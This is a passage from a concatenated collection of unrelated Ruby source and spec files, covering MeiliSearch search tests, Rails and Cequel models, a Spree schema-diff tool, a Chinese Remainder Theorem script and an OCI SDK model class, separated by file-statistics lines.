      redacted_response = Verify::RedactedResponse.new(@response.parameters)
      Rollbar.debug("Verify::RedactedResponse", parameters: redacted_response.parameters)
    end

    def current_policy_routing_name
      claim_from_session&.policy&.routing_name
    end

    # This controller is not namespaced to a policy so we can't redirect a user
    # to a policy-specific start page if a claim isn't in progress. Instead
    # redirect to the root URL and let the routing take care of sending the user
    # to the right place.
    def send_unstarted_claiments_to_the_start
      redirect_to root_url unless current_policy_routing_name
    end
  end
end
35.373333
155
0.745194
21724b183f3dbbe109e3f659730f1fe9e198c0e7
2,401
# frozen_string_literal: true

RSpec.describe 'MeiliSearch::Index - Filtered search' do
  include_context 'search books with author, genre, year'

  before do
    response = index.update_filterable_attributes(['genre', 'year', 'author'])
    index.wait_for_pending_update(response['updateId'])
  end

  it 'does a custom search with one filter' do
    response = index.search('le', { filter: 'genre = romance' })
    expect(response['hits'].count).to eq(1)
    expect(response['hits'].first['objectId']).to eq(2)
  end

  it 'does a custom search with a numerical value filter' do
    response = index.search('potter', { filter: 'year = 2007' })
    expect(response['hits'].count).to eq(1)
    expect(response['hits'].first['objectId']).to eq(2056)
  end

  it 'does a custom search with multiple filter' do
    response = index.search('prince', { filter: 'year > 1930 AND author = "Antoine de Saint-Exupéry"' })
    expect(response['hits'].count).to eq(1)
    expect(response['hits'].first['objectId']).to eq(456)
  end

  it 'does a placeholder search with multiple filter' do
    response = index.search('', { filter: 'author = "J. K. Rowling" OR author = "George R. R. Martin"' })
    expect(response['hits'].count).to eq(3)
  end

  it 'does a placeholder search with numerical values filter' do
    response = index.search('', { filter: 'year < 2000 AND year > 1990' })
    expect(response['hits'].count).to eq(1)
    expect(response['hits'].first['year']).to eq(1996)
  end

  it 'does a placeholder search with multiple filter and different type of values' do
    response = index.search('', { filter: 'author = "J. K. Rowling" AND year > 2006' })
    expect(response['hits'].count).to eq(1)
    expect(response['hits'].first['objectId']).to eq(2056)
  end

  it 'does a custom search with filter and array syntax' do
    response = index.search('prinec', filter: ['genre = fantasy'])
    expect(response.keys).to contain_exactly(*DEFAULT_SEARCH_RESPONSE_KEYS)
    expect(response['nbHits']).to eq(1)
    expect(response['hits'][0]['objectId']).to eq(4)
  end

  it 'does a custom search with multiple filter and array syntax' do
    response = index.search('potter', filter: ['genre = fantasy', ['year = 2005']])
    expect(response.keys).to contain_exactly(*DEFAULT_SEARCH_RESPONSE_KEYS)
    expect(response['nbHits']).to eq(1)
    expect(response['hits'][0]['objectId']).to eq(4)
  end
end
40.016667
105
0.677218
110b92c614007702f184e4834142a01962de06ad
98
module Yardmarshal
  class GemsController < ApplicationController
    def index
    end
  end
end
14
46
0.755102
9144058f7eecaac253959f6b991731f16b70c46e
2,404
class Post < ActiveRecord::Base
  STATUSES = %w(active pending flagged deleted)

  has_many :notes, :order => "id desc"
  has_and_belongs_to_many :pools
  has_many :flags, :class_name => "PostFlag", :order => "flagged_post_details.id ASC"
  has_many :appeals, :class_name => "PostAppeal"
  belongs_to :user
  belongs_to :approver, :class_name => "User"
  attr_accessor :updater_ip_addr, :updater_user_id
  attr_protected :user_id, :score, :md5, :width, :height, :cached_tags, :fav_count, :file_ext, :has_children, :status, :sample_width, :sample_height, :change_seq, :approver_id, :tags_index, :ip_addr

  include PostMethods::SqlMethods
  include PostMethods::CommentMethods
  include PostMethods::ImageStoreMethods
  include PostMethods::VoteMethods
  include PostMethods::TagMethods
  include PostMethods::CountMethods
  include PostMethods::CacheMethods
  include PostMethods::ParentMethods
  include PostMethods::FileMethods
  include PostMethods::ChangeSequenceMethods
  include PostMethods::RatingMethods
  include PostMethods::StatusMethods
  include PostMethods::ApiMethods
  include PostMethods::ModerationMethods
  include PostMethods::DeletionMethods
  include PostMethods::FlagMethods

  # TODO: refactor or eliminate
  def favorited_by
    @favorited_by ||= User.find(:all, :joins => "JOIN favorites f ON f.user_id = users.id", :select => "users.name, users.id, users.created_at, users.level", :conditions => ["f.post_id = ?", id], :order => "f.id DESC")
  end

  def favorited_by_hash
    @favorited_by_hash ||= User.select_all_sql("SELECT users.name, users.id FROM users JOIN favorites f ON f.user_id = users.id WHERE f.post_id = #{id} ORDER BY f.id DESC")
  end

  def author
    return User.find_name(user_id)
  end

  def active_notes
    notes.select {|x| x.is_active?}
  end

  def active_notes_hash
    @active_notes_hash ||= Note.select_all_sql("SELECT * FROM notes WHERE post_id = #{id} AND is_active = TRUE")
  end

  def can_be_seen_by?(user)
    CONFIG["can_see_post"].call(user, self)
  end

  def normalized_source
    if source =~ /pixiv\.net\/img\//
      img_id = source[/(\d+)(_s|_m|(_big)?_p\d+)?\.[\w\?]+\s*$/, 1]

      if $2 =~ /_p/
        "http://www.pixiv.net/member_illust.php?mode=manga&illust_id=#{img_id}"
      else
        "http://www.pixiv.net/member_illust.php?mode=medium&illust_id=#{img_id}"
      end
    else
      source
    end
  end
end
34.84058
218
0.71381
ff107c61f282111295938a7f2b9248749362baf3
10,437
module Cequel module Record # # Properties on a Cequel record acts as attributes on record instances, and # are persisted as column values to Cassandra. Properties are declared # explicitly on a record instance in the body. # # Properties can be **key columns**, **data columns**, or **collection # columns**. Key columns combine to form the primary key for the record; # they cannot be changed once a record has been saved. Data columns contain # scalar data values like strings, integers, and timestamps. Collection # columns are lists, sets, or maps that can be atomically updated. # # All varieties of column have a type; see {Cequel::Type} for the full # list of possibilities. A collection column's type is the type of its # elements (in the case of a map collection, there is both a key type and a # value type). # # @example # class Post # key :blog_subdomain, :text # key :id, :timeuuid, auto: true # # column :title, :text # column :body, :text # column :updated_at, :timestamp # # list :categories, :text # set :tags, :text # map :referers, :text, :integer # end # # @see ClassMethods Methods for defining properties # module Properties extend ActiveSupport::Concern included do class_attribute :default_attributes, :instance_writer => false self.default_attributes = {} class <<self; alias_method :new_empty, :new; end extend ConstructorMethods attr_reader :collection_proxies private :collection_proxies end # @private module ConstructorMethods def new(*args, &block) new_empty.tap do |record| record.__send__(:initialize_new_record, *args) yield record if block_given? end end end # # Methods for defining columns on a record # # @see Properties # module ClassMethods protected # @!visibility public # # Define a key column. By default, the first key column defined for a # record will be a partition key, and the following keys will be # clustering columns. This behavior can be changed using the # `:partition` option # # @param name [Symbol] the name of the key column # @param type [Symbol] the type of the key column # @param options [Options] options for the key column # @option options [Boolean] :partition (false) make this a partition key # even if it is not the first key column # @option options [Boolean] :auto (false) automatically initialize this # key with a UUID value for new records. Only valid for `uuid` and # `timeuuid` columns. # @return [void] # # @note {Associations::ClassMethods#belongs_to belongs_to} implicitly # defines key columns. 
# # @see # http://www.datastax.com/documentation/cql/3.0/webhelp/index.html#cql/ddl/ddl_anatomy_table_c.html#concept_ds_cz4_lmy_zj # CQL documentation on compound primary keys # def key(name, type, options = {}) def_accessors(name) if options.fetch(:auto, false) unless Type[type].is_a?(Cequel::Type::Uuid) raise ArgumentError, ":auto option only valid for UUID columns" end default = -> { CassandraCQL::UUID.new } if options.fetch(:auto, false) end set_attribute_default(name, default) end # # Define a data column # # @param name [Symbol] the name of the column # @param type [Symbol] the type of the column # @param options [Options] options for the column # @option options [Object,Proc] :default a default value for the column, # or a proc that returns a default value for the column # @return [void] # def column(name, type, options = {}) def_accessors(name) set_attribute_default(name, options[:default]) end # # Define a list column # # @param name [Symbol] the name of the list # @param type [Symbol] the type of the elements in the list # @param options [Options] options for the list # @option options [Object,Proc] :default ([]) a default value for the column, # or a proc that returns a default value for the column # @return [void] # # @see Record::List # @since 1.0.0 # def list(name, type, options = {}) def_collection_accessors(name, List) set_attribute_default(name, options.fetch(:default, [])) end # # Define a set column # # @param name [Symbol] the name of the set # @param type [Symbol] the type of the elements in the set # @param options [Options] options for the set # @option options [Object,Proc] :default (Set[]) a default value for the column, # or a proc that returns a default value for the column # @return [void] # # @see Record::Set # @since 1.0.0 # def set(name, type, options = {}) def_collection_accessors(name, Set) set_attribute_default(name, options.fetch(:default, ::Set[])) end # # Define a map column # # @param name [Symbol] the name of the map # @param key_type [Symbol] the type of the keys in the set # @param options [Options] options for the set # @option options [Object,Proc] :default ({}) a default value for the column, # or a proc that returns a default value for the column # @return [void] # # @see Record::Map # @since 1.0.0 # def map(name, key_type, value_type, options = {}) def_collection_accessors(name, Map) set_attribute_default(name, options.fetch(:default, {})) end private def def_accessors(name) name = name.to_sym def_reader(name) def_writer(name) end def def_reader(name) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name}; read_attribute(#{name.inspect}); end RUBY end def def_writer(name) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name}=(value); write_attribute(#{name.inspect}, value); end RUBY end def def_collection_accessors(name, collection_proxy_class) def_collection_reader(name, collection_proxy_class) def_collection_writer(name) end def def_collection_reader(name, collection_proxy_class) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name} proxy_collection(#{name.inspect}, #{collection_proxy_class}) end RUBY end def def_collection_writer(name) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name}=(value) reset_collection_proxy(#{name.inspect}) write_attribute(#{name.inspect}, value) end RUBY end def set_attribute_default(name, default) default_attributes[name.to_sym] = default end end # @private def initialize(attributes = {}, record_collection = nil) @attributes, @record_collection = attributes, record_collection @collection_proxies = {} end # # 
@return [Array<Symbol>] list of names of attributes on this record # def attribute_names @attributes.keys end # # @return [Hash<Symbol,Object>] map of column names to values currently # set on this record # def attributes attribute_names.each_with_object({}) do |name, attributes| attributes[name] = read_attribute(name) end end # # Set attributes on the record. Each attribute is set via the setter # method; virtual (non-column) attributes are allowed. # # @param attributes [Hash] map of attribute names to values # @return [void] # def attributes=(attributes) attributes.each_pair do |attribute, value| __send__(:"#{attribute}=", value) end end # # @return [Boolean] true if this record has the same type and key # attributes as the other record def ==(other) if key_values.any? { |value| value.nil? } super else self.class == other.class && key_values == other.key_values end end # # @return [String] string representation of the record # def inspect inspected_attributes = attributes.each_pair.map do |attr, value| inspected_value = value.is_a?(CassandraCQL::UUID) ? value.to_guid : value.inspect "#{attr}: #{inspected_value}" end "#<#{self.class} #{inspected_attributes.join(", ")}>" end protected def read_attribute(name) @attributes.fetch(name) rescue KeyError if self.class.reflect_on_column(name) raise MissingAttributeError, "missing attribute: #{name}" else raise UnknownAttributeError, "unknown attribute: #{name}" end end def write_attribute(name, value) @attributes[name] = value end private def proxy_collection(column_name, proxy_class) column = self.class.reflect_on_column(column_name) collection_proxies[column_name] ||= proxy_class.new(self, column) end def reset_collection_proxy(name) collection_proxies.delete(name) end def initialize_new_record(attributes = {}) dynamic_defaults = default_attributes. select { |name, value| value.is_a?(Proc) } @attributes = Marshal.load(Marshal.dump( default_attributes.except(*dynamic_defaults.keys))) dynamic_defaults.each { |name, p| @attributes[name] = p.() } @new_record = true yield self if block_given? self.attributes = attributes loaded! self end end end end
32.212963
131
0.590974
ff9ea83f914858b9ba6d1d5ee83fabca8b2d8e5c
954
require_relative 'array_list'

describe ArrayList do
  # describe '#initialize' do
  #   let(:array) { ArrayList.new(FixedArray.new) }
  #   it 'creates a new ArrayList' do
  #     expect(array.array).to be_a(FixedArray)
  #   end
  # end

  describe '#add' do
    let(:array) { ArrayList.new(FixedArray.new) }
    it 'will add an element to the fixed array' do
      expect(array.add('yes')).to eq('yes')
    end
  end

  describe '#get' do
    let(:array) { ArrayList.new(FixedArray.new) }
    it 'will retrieve an element from a given index' do
      expect(array.get(0)).to eq(nil)
    end
  end

  describe '#set' do
    let(:array) { ArrayList.new(FixedArray.new) }
    it 'will set and element at a given index' do
      expect(array.set(0, 'no')).to eq('no')
    end
  end

  describe '#size' do
    let(:array) { ArrayList.new(FixedArray.new) }
    it 'will show the length of the array' do
      expect(array.size).to eq(4)
    end
  end
end
23.268293
55
0.629979
1d860a608deeef93ea2465af424921fea1dba78a
1,932
class StopAreaReferentialSync < ApplicationModel
  include SyncSupport
  include AASM

  belongs_to :stop_area_referential
  has_many :stop_area_referential_sync_messages, :dependent => :destroy
  after_commit :perform_sync, :on => :create
  validate :multiple_process_validation, :on => :create
  scope :pending, -> { where(status: [:new, :pending]) }

  alias_method :referential, :stop_area_referential

  private

  def perform_sync
    create_sync_message :info, :new
    StopAreaReferentialSyncWorker.perform_async_or_fail(self) do
      log_failed({})
    end
  end

  # There can be only one instance running
  def multiple_process_validation
    if self.class.where(status: [:new, :pending], stop_area_referential_id: stop_area_referential_id).count > 0
      errors.add(:base, :multiple_process)
    end
  end

  aasm column: :status do
    state :new, :initial => true
    state :pending
    state :successful
    state :failed

    event :run, after: :log_pending do
      transitions :from => :new, :to => :pending
    end

    event :successful, after: :log_successful do
      transitions :from => [:pending, :failed], :to => :successful
    end

    event :failed, after: :log_failed do
      transitions :from => [:new, :pending], :to => :failed
    end
  end

  def create_sync_message criticity, key, message_attributes = {}
    params = { criticity: criticity, message_key: key, message_attributes: message_attributes }
    stop_area_referential_sync_messages.create params
  end

  def log_pending
    update_attribute(:started_at, Time.now)
    create_sync_message :info, :pending
  end

  def log_successful message_attributes
    update_attribute(:ended_at, Time.now)
    create_sync_message :info, :successful, message_attributes
  end

  def log_failed message_attributes
    update_attribute(:ended_at, Time.now)
    create_sync_message :error, :failed, message_attributes
  end
end
26.833333
111
0.717909
391ecaa3de2220f6a668021f33d779dcc8b082b0
1,267
#- Copyright © 2008-2011 8th Light, Inc. All Rights Reserved.
#- Limelight and all included source files are distributed under terms of the MIT License.

require File.expand_path(File.dirname(__FILE__) + "/../spec_helper")
require 'limelight/string'

describe String do

  it "should convert into camel case" do
    "class_name".camelized.should == "ClassName"
    "once_upon_a_time".camelized.should == "OnceUponATime"
    "with spaces".camelized.should == "WithSpaces"
  end

  it "should convert into camel case" do
    "class_name".camelized(:lower).should == "className"
    "once_upon_a_time".camelized(:lower).should == "onceUponATime"
    "with spaces".camelized(:lower).should == "withSpaces"
  end

  it "should underscore a name" do
    "ClassName".underscored.should == "class_name"
    "OneTwoThree".underscored.should == "one_two_three"
    "One".underscored.should == "one"
  end

  it "should convert a string to title" do
    "class_name".titleized.should == "Class Name"
    "once_upon_a_time".titleized.should == "Once Upon A Time"
    "AbC_eFg_hiJ".titleized.should == "Ab C E Fg Hi J"
    "with spaces".titleized.should == "With Spaces"
    "Some Title".titleized.should == "Some Title"
    "SomeTitle".titleized.should == "Some Title"
  end

end
35.194444
90
0.705604
39a8bdc69b76eb9aeecb4c3e32a3e09d6a2eb4ee
7,294
require 'digest/md5'

module SpreeMigrateDB

  MappingItem = Struct.new(:current, :export, :options) do
    def actions
      @actions = []
    end

    def action
      :unknown
    end

    def as_question
      "#{export} -> #{current} :: #{action}"
    end

    def question_opts
      actions
    end

    def save_action(action)
      return if action == :default || action == false
      @action = actions.detect{ |a| a.to_s[0].upcase == action }
      UI.say "Changed action to #{@action}."
    end
  end

  TableMappingItem = Class.new(MappingItem) do
    def type
      :table
    end

    def canonical_table_name
      @c_table_name ||= begin
        t = options.fetch(:canonical) { export.name }
        t = export.name if t == :not_canonical
        t
      end
    end

    def actions
      @actions = [ :create, :rename, :skip ]
    end

    def <=>(other)
      "#{export.name}" <=> "#{other.export.name}"
    end

    def action
      return @action if @action
      if current.name == :not_canonical
        :create
      else
        :skip
      end
    end
  end

  IndexMappingItem = Class.new(MappingItem) do
    def type
      :index
    end

    def canonical_table_name
      @c_table_name ||= options.fetch(:canonical_table_name) { export.table }
    end

    def actions
      @actions = [ :create, :recreate, :skip ]
    end

    def <=>(other)
      "#{export.table}#{export.name}" <=> "#{other.export.table}#{other.export.name}"
    end

    def action
      return @action if @action
      if current == :not_canonical || current == :not_found
        :create
      elsif options[:missing] && options[:new] && options[:missing].empty? && options[:new].empty?
        :skip
      elsif ! options.empty?
        :recreate
      else
        :skip
      end
    end
  end

  FieldMappingItem = Class.new(MappingItem) do
    def type; :field; end

    def as_question
      if (options && options.empty?) || options.nil?
        opts = ""
      else
        opts = ""
        options.each_pair do |k,v|
          opts << "\n -- #{k}: '#{v}'"
        end
        opts << "\n"
      end
      "#{export} -> #{current} :: #{action}#{opts}"
    end

    def actions
      @actions = [ :create, :skip, :update ]
    end

    def <=>(other)
      "#{self.export}#{self.current}" <=> "#{other.export}#{other.current}"
    end

    def action
      return @action if @action
      if current == :no_table
        :skip
      elsif current == :no_field
        :create
      elsif current == export && ! options.empty?
        :update
      else
        :skip
      end
    end
  end

  class SchemaDefinitionDiff
    attr_accessor :mapping_dir
    attr_reader :mapping

    def initialize(current_schema, other_schema)
      @current_schema = current_schema
      @other_schema = other_schema
      @mapping_dir = ""
      @mapping = build_initial_mapping
    end

    def has_saved_mapping?
      File.exist? saved_mapping_file
    end

    def saved_mapping_file
      @saved_mapping_file ||= File.join(@mapping_dir, "mapping-#{diff_id}.map")
    end

    def load_mapping_from_file
      json_mapping = File.read(saved_mapping_file)
      @mapping = JSON.parse(json_mapping)
    end

    def save_mapping
      File.open saved_mapping_file, "w" do |f|
        f.write @mapping.to_json
      end
    end

    def identical?
      current_checksum == other_checksum
    end

    def diff_id
      "#{current_checksum}-#{other_checksum}"
    end

    private

    def current_checksum
      @current_checksum ||= checksum(@current_schema)
    end

    def other_checksum
      @other_checksum ||= checksum(@other_schema)
    end

    def checksum(schema)
      # WARNING: This will not work with ruby 1.8.x because order of hash keys isn't guaranteed.
      d = Digest::MD5.hexdigest schema.to_hash.to_s
      d.first(6) # don't need the whole thing
    end

    def build_initial_mapping
      m = { :tables => [], :indexes => [], :fields => [] }
      return m if identical?

      m[:tables] = table_mappings
      m[:indexes] = index_mappings
      m[:fields] = field_mappings
      m
    end

    def table_mappings
      return @table_mapping if @table_mapping
      mapping = []
      @other_schema.table_defs.each do |t|
        canonical_name = canonical_lookup.canonical_table_name(t.name)
        current_table = @current_schema.lookup_table(canonical_name)
        mapping << TableMappingItem.new(current_table, t, {:canonical => canonical_name})
      end
      @table_mapping = mapping
    end

    def index_mappings
      mapping = []
      @other_schema.indexes.each do |i|
        table_name = canonical_lookup.canonical_table_name(i.table)
        if table_name == :not_canonical
          mapping << IndexMappingItem.new(table_name, i, {})
        else
          mapping << unmatched_index_items(table_name, i)
        end
      end
      mapping.flatten
    end

    def field_mappings
      mapping = []
      table_mappings.each do |tm|
        next if tm.action == :create
        current_fields = canonical_lookup.canonical_fields(tm.current).simplify_elements
        other_fields = canonical_lookup.canonical_fields(tm.export).simplify_elements
        missing, new, same, all = compare_arrays(current_fields, other_fields)

        missing.each do |m|
          # compare the options
          el1, el2 = all.select{|el| el.to_s == m.to_s}
          if el2
            new_opts = el1.options.merge el2.options
            export = m
          else
            new_opts = {}
            export = :default
          end
          mapping << FieldMappingItem.new(m, export, new_opts)
        end

        new.each do |d|
          el1, el2 = all.select{|el| el.to_s == d.to_s}
          mapping << FieldMappingItem.new(:no_field, d) unless el2
        end

        same.each do |s|
          mapping << FieldMappingItem.new(s, s, {})
        end
      end
      mapping
    end

    def compare_arrays(arr1, arr2)
      missing = arr1 - arr2
      new = arr2 - arr1
      same = arr1 & arr2
      all = arr1 | arr2
      [missing, new, same, all]
    end

    def canonical_lookup
      @canonical_lookup ||= CanonicalSpree::Lookup.new(@current_schema.spree_version)
    end

    def index_lookup_for_table(table_name)
      @current_schema.indexes.select {|i| i.table.to_s == table_name.to_s}
    end

    def unmatched_index_items(table_name, i)
      indexes_for_current_table = index_lookup_for_table(table_name)
      indexes_with_same_fields = indexes_for_current_table.select do |ci|
        missing, new, same = compare_arrays(ci.fields, i.fields)
        ! same.empty?
      end

      unmatched = []
      if indexes_with_same_fields.empty?
        unmatched << IndexMappingItem.new(:not_found, i, {:canonical_table_name => table_name})
      else
        indexes_with_same_fields.each do |ci|
          missing, new, same = compare_arrays(ci.fields, i.fields)
          unmatched << IndexMappingItem.new(ci, i, {
            :canonical_table_name => table_name,
            :missing => missing,
            :new => new
          })
        end
      end
      unmatched
    end
  end
end
23.155556
98
0.585001
e8e41b223042da5cee2b028de5d1ea13d0d1b91a
1,231
require './mathlibs/discrete_math'

# Using rules derived from Chinese Remainder Theorom, Solve a System of congruences
# See, Chinese Remainder Theorem section 3.7 Rosen.

puts "\nHow many congruencies of a system?\n"
number_of_congruencies = gets.to_i

i=0
systems = Array.new
product_of_m = 1

while number_of_congruencies > i
  # get each b and m for the form x == b (mod m)
  puts "Wht is the integer b : x == b(mod m)?\n"
  b = gets.to_i
  puts "Wht is the integer m : x == #{b}(mod m)?\n"
  m = gets.to_i
  product_of_m *=m
  congruence = Congruence.new(b, m)
  systems.push(congruence)
  i+=1
end

# TODO: need ot check if all m are relativily prime

# Perform a simultaneous solution
discMath = DiscreteMath.new()
steps = Array.new
step_count = 1
x = 0

systems.each do |c|
  s, t = discMath.extended_gcd(product_of_m/c.m, c.m)
  k = 1
  while s < 0
    s = s + (c.m * k)
    k += 1
  end
  step = SolutionStep.new(product_of_m/c.m, s, c.b)
  steps.push(step)
  puts "step#{step_count}: m is #{product_of_m/c.m}, s is #{s}, a is #{c.b}\n"
  step_count += 1
  x += step.product
end

b = x % product_of_m
puts "\n#{x} == b (mod #{product_of_m})\n"
puts "Therefore, #{b} + #{product_of_m}*k = x, where k is any integer."
24.62
83
0.660439
f75eaea655aaeff84947ba26fe93401d4e7a9d23
379
module Minicoin
  module SyncedFolderSSHFS
    class Plugin < Vagrant.plugin("2")
      name "SSHFS syncing for darwin guests as a shared_folders plugin"
      synced_folder(:sshfs) do # default priority, but only usable where native isn't
        require_relative "synced_folder.rb"
        SyncedFolder
      end
    end
  end
end
31.583333
91
0.617414
4a7ab46db9e83616b3c967f4cda867f38622f5c3
14,121
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. require 'date' require 'logger' # rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength module OCI # Summary of a Data Safe private endpoint. class DataSafe::Models::DataSafePrivateEndpointSummary LIFECYCLE_STATE_ENUM = [ LIFECYCLE_STATE_CREATING = 'CREATING'.freeze, LIFECYCLE_STATE_UPDATING = 'UPDATING'.freeze, LIFECYCLE_STATE_ACTIVE = 'ACTIVE'.freeze, LIFECYCLE_STATE_DELETING = 'DELETING'.freeze, LIFECYCLE_STATE_DELETED = 'DELETED'.freeze, LIFECYCLE_STATE_FAILED = 'FAILED'.freeze, LIFECYCLE_STATE_NA = 'NA'.freeze, LIFECYCLE_STATE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze ].freeze # **[Required]** The OCID of the Data Safe private endpoint. # @return [String] attr_accessor :id # **[Required]** The display name of the private endpoint. # @return [String] attr_accessor :display_name # **[Required]** The OCID of the compartment. # @return [String] attr_accessor :compartment_id # **[Required]** The OCID of the VCN. # @return [String] attr_accessor :vcn_id # **[Required]** The OCID of the subnet. # @return [String] attr_accessor :subnet_id # **[Required]** The OCID of the private endpoint. # @return [String] attr_accessor :private_endpoint_id # The description of the private endpoint. # @return [String] attr_accessor :description # The date and time the private endpoint was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). # @return [DateTime] attr_accessor :time_created # The current state of the private endpoint. # @return [String] attr_reader :lifecycle_state # Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm) # # Example: `{\"Department\": \"Finance\"}` # # @return [Hash<String, String>] attr_accessor :freeform_tags # Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm) # # Example: `{\"Operations\": {\"CostCenter\": \"42\"}}` # # @return [Hash<String, Hash<String, Object>>] attr_accessor :defined_tags # System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see Resource Tags. # Example: `{\"orcl-cloud\": {\"free-tier-retained\": \"true\"}}` # # @return [Hash<String, Hash<String, Object>>] attr_accessor :system_tags # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { # rubocop:disable Style/SymbolLiteral 'id': :'id', 'display_name': :'displayName', 'compartment_id': :'compartmentId', 'vcn_id': :'vcnId', 'subnet_id': :'subnetId', 'private_endpoint_id': :'privateEndpointId', 'description': :'description', 'time_created': :'timeCreated', 'lifecycle_state': :'lifecycleState', 'freeform_tags': :'freeformTags', 'defined_tags': :'definedTags', 'system_tags': :'systemTags' # rubocop:enable Style/SymbolLiteral } end # Attribute type mapping. 
def self.swagger_types { # rubocop:disable Style/SymbolLiteral 'id': :'String', 'display_name': :'String', 'compartment_id': :'String', 'vcn_id': :'String', 'subnet_id': :'String', 'private_endpoint_id': :'String', 'description': :'String', 'time_created': :'DateTime', 'lifecycle_state': :'String', 'freeform_tags': :'Hash<String, String>', 'defined_tags': :'Hash<String, Hash<String, Object>>', 'system_tags': :'Hash<String, Hash<String, Object>>' # rubocop:enable Style/SymbolLiteral } end # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity # rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral # Initializes the object # @param [Hash] attributes Model attributes in the form of hash # @option attributes [String] :id The value to assign to the {#id} property # @option attributes [String] :display_name The value to assign to the {#display_name} property # @option attributes [String] :compartment_id The value to assign to the {#compartment_id} property # @option attributes [String] :vcn_id The value to assign to the {#vcn_id} property # @option attributes [String] :subnet_id The value to assign to the {#subnet_id} property # @option attributes [String] :private_endpoint_id The value to assign to the {#private_endpoint_id} property # @option attributes [String] :description The value to assign to the {#description} property # @option attributes [DateTime] :time_created The value to assign to the {#time_created} property # @option attributes [String] :lifecycle_state The value to assign to the {#lifecycle_state} property # @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {#freeform_tags} property # @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {#defined_tags} property # @option attributes [Hash<String, Hash<String, Object>>] :system_tags The value to assign to the {#system_tags} property def initialize(attributes = {}) return unless attributes.is_a?(Hash) # convert string to symbol for hash key attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v } self.id = attributes[:'id'] if attributes[:'id'] self.display_name = attributes[:'displayName'] if attributes[:'displayName'] raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name') self.display_name = attributes[:'display_name'] if attributes[:'display_name'] self.compartment_id = attributes[:'compartmentId'] if attributes[:'compartmentId'] raise 'You cannot provide both :compartmentId and :compartment_id' if attributes.key?(:'compartmentId') && attributes.key?(:'compartment_id') self.compartment_id = attributes[:'compartment_id'] if attributes[:'compartment_id'] self.vcn_id = attributes[:'vcnId'] if attributes[:'vcnId'] raise 'You cannot provide both :vcnId and :vcn_id' if attributes.key?(:'vcnId') && attributes.key?(:'vcn_id') self.vcn_id = attributes[:'vcn_id'] if attributes[:'vcn_id'] self.subnet_id = attributes[:'subnetId'] if attributes[:'subnetId'] raise 'You cannot provide both :subnetId and :subnet_id' if attributes.key?(:'subnetId') && attributes.key?(:'subnet_id') self.subnet_id = attributes[:'subnet_id'] if attributes[:'subnet_id'] self.private_endpoint_id = attributes[:'privateEndpointId'] if attributes[:'privateEndpointId'] raise 'You cannot provide both :privateEndpointId and :private_endpoint_id' if attributes.key?(:'privateEndpointId') && attributes.key?(:'private_endpoint_id') 
self.private_endpoint_id = attributes[:'private_endpoint_id'] if attributes[:'private_endpoint_id'] self.description = attributes[:'description'] if attributes[:'description'] self.time_created = attributes[:'timeCreated'] if attributes[:'timeCreated'] raise 'You cannot provide both :timeCreated and :time_created' if attributes.key?(:'timeCreated') && attributes.key?(:'time_created') self.time_created = attributes[:'time_created'] if attributes[:'time_created'] self.lifecycle_state = attributes[:'lifecycleState'] if attributes[:'lifecycleState'] raise 'You cannot provide both :lifecycleState and :lifecycle_state' if attributes.key?(:'lifecycleState') && attributes.key?(:'lifecycle_state') self.lifecycle_state = attributes[:'lifecycle_state'] if attributes[:'lifecycle_state'] self.freeform_tags = attributes[:'freeformTags'] if attributes[:'freeformTags'] raise 'You cannot provide both :freeformTags and :freeform_tags' if attributes.key?(:'freeformTags') && attributes.key?(:'freeform_tags') self.freeform_tags = attributes[:'freeform_tags'] if attributes[:'freeform_tags'] self.defined_tags = attributes[:'definedTags'] if attributes[:'definedTags'] raise 'You cannot provide both :definedTags and :defined_tags' if attributes.key?(:'definedTags') && attributes.key?(:'defined_tags') self.defined_tags = attributes[:'defined_tags'] if attributes[:'defined_tags'] self.system_tags = attributes[:'systemTags'] if attributes[:'systemTags'] raise 'You cannot provide both :systemTags and :system_tags' if attributes.key?(:'systemTags') && attributes.key?(:'system_tags') self.system_tags = attributes[:'system_tags'] if attributes[:'system_tags'] end # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity # rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral # Custom attribute writer method checking allowed values (enum). # @param [Object] lifecycle_state Object to be assigned def lifecycle_state=(lifecycle_state) # rubocop:disable Style/ConditionalAssignment if lifecycle_state && !LIFECYCLE_STATE_ENUM.include?(lifecycle_state) OCI.logger.debug("Unknown value for 'lifecycle_state' [" + lifecycle_state + "]. Mapping to 'LIFECYCLE_STATE_UNKNOWN_ENUM_VALUE'") if OCI.logger @lifecycle_state = LIFECYCLE_STATE_UNKNOWN_ENUM_VALUE else @lifecycle_state = lifecycle_state end # rubocop:enable Style/ConditionalAssignment end # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines # Checks equality by comparing each attribute. # @param [Object] other the other object to be compared def ==(other) return true if equal?(other) self.class == other.class && id == other.id && display_name == other.display_name && compartment_id == other.compartment_id && vcn_id == other.vcn_id && subnet_id == other.subnet_id && private_endpoint_id == other.private_endpoint_id && description == other.description && 